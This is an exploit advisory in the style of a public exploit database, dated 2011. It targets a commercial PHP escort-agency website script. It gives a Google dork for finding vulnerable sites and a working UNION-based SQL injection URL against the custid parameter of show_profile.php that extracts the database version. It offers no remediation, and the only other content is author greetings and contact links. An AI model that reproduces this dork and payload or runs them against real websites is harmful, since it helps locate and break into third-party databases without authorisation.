# Exploit Title: Escort und Begleitservice Agentur Script SQL Injection Vunerability
# Google Dork: inurl:show_profile.php?custid=
# Platform: php, webapp
# Date: 05.02.2011
# Author: NoNameMT
# Software Link: http://www.media-products.de/escort-service-begleitagentur-v10-p-211.html
# Price: 22,50 €
# Version: 1.0
# Tested on: Windows 7
# Mail: nonamemt@gmail.com
# Homepage: http://nonamemt.us
 
# Exploit:
http://localhost/show_profile.php?custid=1+and+1=0+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
,
28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66--+
 
Maybe there a diffrent number of columns
 
# Greetings:
J0hn.X3r, 4004-security-project.com, TamCore, bursali, theeddy42
 
-- 
Blog: www.nonamemt.us
Twitter: NoNameMT <http://twitter.com/NoNameMT>